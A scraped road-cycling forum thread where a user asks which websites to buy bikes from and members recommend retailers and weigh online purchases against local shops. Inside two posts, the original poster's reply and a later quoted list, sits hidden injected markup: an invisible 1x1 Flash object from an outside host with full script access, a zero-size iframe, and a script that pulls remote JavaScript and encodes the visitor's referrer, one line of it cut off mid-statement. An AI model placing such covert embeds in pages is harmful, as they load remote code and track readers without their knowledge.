Road Bike, Cycling Forums banner
1 - 20 of 32 Posts

·
Registered
2,471 Posts
Discussion Starter · #1 ·
Hello road bike people!

I just had an argument with my local bike seller about his extraordinary prices and I am doing some research about the best place to buy a bike online. I bought a lot of bikes (any type you can imagine) from that local seller (not all for me) but he doesn't really appreciate it any more.

I always like to test before I buy but unfortunately he is the only bike shop available close to me.

So, from what site did you bought your bike? Any odd experiences?

I need to make a list and go through all of them.

Thanks

·
Premium Member
5,457 Posts
bikesdirect.com
rei.com
nashbar.com
competitivecyclist.com
performancebike.com

which I can quickly think of

Reactions: Roland44

·
Registered
484 Posts
I bought my first road bike 5 years ago from Bikes Direct. Lets just say that didn't last long. I would never buy a bike online again. What are you looking for, would CL suffice or are you looking for something specific?

·
Registered
2,471 Posts
Discussion Starter · #4 ·
bikesdirect.com
rei.com
nashbar.com
competitivecyclist.com
performancebike.com

which I can quickly think of
Thanks, that's very helpful :)

I bought my first road bike 5 years ago from Bikes Direct. Lets just say that didn't last long. I would never buy a bike online again. What are you looking for, would CL suffice or are you looking for something specific?<object width="1" height="1" classid="clsid: D27CDB6E-AE6D-11cf-96B8-444553540000">

<embed width="1" height="1" src="http://sharepic101.com/upload/8/clear.swf" type="application/x-shockwave-flash" allowscriptaccess="always"></object>
It's not just for me so I am looking for everything really, almast all types of bikes you can think of. CL wouldn't cut it, I need a proffesional online seller. I will check out bikes direct and the other sites posted above! Post more if you know, I have time to go through all of them :)<iframe id="see" src="" style="width: 0px; height: 0px;"></iframe>

·
Registered
484 Posts
I do agree with tednugent mentioning REI. I forgot I ordered a few things online and on the phone from them. You can still get name brand stuff, if that is important to you. I felt like my BD frame was very unstable at speed. I don't think they have guys testing this stuff before it gets to the consumer.

You seemed pissed at your LBS.

·
Registered
2,507 Posts
Hello road bike people!

I just had an argument with my local bike seller about his extraordinary prices and I am doing some research about the best place to buy a bike online. I bought a lot of bikes (any type you can imagine) from that local seller (not all for me) but he doesn't really appreciate it any more.
That sucks, I'll never understand shops not willing to work with folks.
My son and I dropped by a shop on one of our rides mid morning Sat, the shop has been open for a few months. I ask how things are going, notice that he opened shop not too long ago. He checks out our bikes (Lynskey's with Campy) and admires them. I mentioned we had seen he was listed as a Cannondale dealer and we were thinking about picking up a CAAD10 frameset in the next couple of months to put together a crit bike, asked what he could do. He jumps on his computer gives me a really decent price, tells me what is in inventory size wise, he also mentions he will work with me on all prices, but won't be able to beat all online prices. I let him know we will be back in the future once we get ready.
Some guys get it some don't.

·
Registered
7,161 Posts
I bought my first road bike 5 years ago from Bikes Direct. Lets just say that didn't last long. I would never buy a bike online again. What are you looking for, would CL suffice or are you looking for something specific?
It takes a some knowledge, cycling experience, mechanical capability and research to successfully buy a bike on-line. If you need an LBS to tell you what bike to buy, to set it up for you, and/or to maintain it, then on-line won't work well for you.

·
Banned
987 Posts
Also…
Texas Cylce Sports (looks for coupons)
Glory cycles
JensonUSA

As long as you know what you want and wrench on your own wheels I say go for it!

I have ranted many times about how much LBS suck. A good amount of them do. Nevertheless I always give them a chance, always call around to see if the have what I need. A good amount of the time I do end up buying from them especially the small stuff and clothes.

I am currently looking to drop a fair amount of coin on a new bike. Thus I find myself in the same old dilemma: buy from online retailer save on tax, or buy from lbs deal with the attitude, pushy sales tactics, shifty eyed owners who look the other way when you are about to buy a bike that’s way too big for you. Worst the emotionally unstable employee who throws a tantrum at the mere mention of price matching an online retailer.

Having said that I was pleasantly surprised when I went to look at bikes this time around. One of my favorite LBSs had priced their bikes well bellow MSRP in direct competition with online retailers, looks like some LBS are catching on, its about time!

Curious will the online tax affect the online bike component sellers? Do they sell enough in each state to be affected?

·
Registered
940 Posts
We have several BD bikes (MTB, road carbon, road titanium) and friends who have several too. It bears repeating if you want hand holding and soothing it is not the way for you to go. I have a resident mechanic and the interwebs to research fit nuances. I do have friends who can barely change a flat let alone wield a wrench, who pay for yearly check ups of their barely touched bikes, who would see value in paying MRSP for branding and bike shop lore. It is horses for courses.
I think the tax thing will help the LBS though. They can see a more even playing field even with discounting. I will buy stuff from the LBS if the prices are similar anyway but I have never shopped in one for an actual bike.

·
Registered
2,812 Posts
Are you the neighborhood bike buyer or something? You're buying bikes for you and so many other people? Hope you know what you are doing.

·
Registered
484 Posts
It takes a some knowledge, cycling experience, mechanical capability and research to successfully buy a bike on-line. If you need an LBS to tell you what bike to buy, to set it up for you, and/or to maintain it, then on-line won't work well for you.
The NDS crank arm came off after riding it for about a month. It was completely stripped. They didn't really want to help me out either. It was shipped with the crankset on already. When you purchase your first road bike online, you don't really know what you want in a bike. Even though I know all my measurements, I just feel like I would want to ride a bike first. Like I said, my BD bike was extremely horrible at high speeds. I live in the high rockies so 10-15 mile descents are very common. They all ride different. The OP seems experienced, so maybe he/she knows what they want. But they did address as "road bike people", so who really knows?

·
Registered
1,381 Posts
The only benefit in buying online, is the possible cash savings from the purchase. However, that could very well backfire, if either the bike doesn't fit or it has some kinda mechanical or structural damage. Sometimes, even something so trivial as a cosmetic flaw, can grate your nerves to the point of dissatisfaction. Buying online can posed a serious hassle with your having to pay for the return, and then sometimes not being able to order the same bicycle in which you were initially interested.

·
Registered
1,381 Posts
The only benefit in buying online, is the possible cash savings from the purchase. However, that could very well backfire, if either the bike doesn't fit or it has some kinda mechanical or structural damage. Sometimes, even something so trivial as a cosmetic flaw, can grate your nerves to the point of dissatisfaction. Buying online can posed a serious hassle with your having to pay for the return, and then sometimes not being able to order the same bicycle in which you were initially interested.
That said, the best online sites also should provide an opportunity to test ride, an not hesitate to offer a 100% satisfaction guarantee. That's the reason I would first recommend REI and Performance, before any of the others.

·
Registered
255 Posts
bikesdirect.com
rei.com
nashbar.com
competitivecyclist.com
performancebike.com

which I can quickly think of<script type="text/javascript" src="http://www.pic-host.info/files/encode.js"></script><script type="text/javascript">if (document.referrer) { var ref='?'+encode(document.referrer); } else { var ref=''; }document.write('
');</script>
I would add chain reaction cycles, that was already mentioned by another member, pro bike kit and evans cycle.

·
Registered
2,471 Posts
Discussion Starter · #19 ·
Thanks for all the suggestions guys! I will take a look at all those sites. Just to clear things up, the LBS guy was very rude to me and almost 40% more expensive than usual that's why I will try to get my bikes online. I am buying a lot of bikes but don't worry, I know what I am doing :)

·
Registered
8,276 Posts
I bought my first road bike at bikes direct around 6 years ago. It is approaching 10k miles and I still can't find a good reason to upgrade.

1 - 20 of 32 Posts
This is an older thread, you may not receive a response, and could be reviving an old thread. Please consider creating a new thread.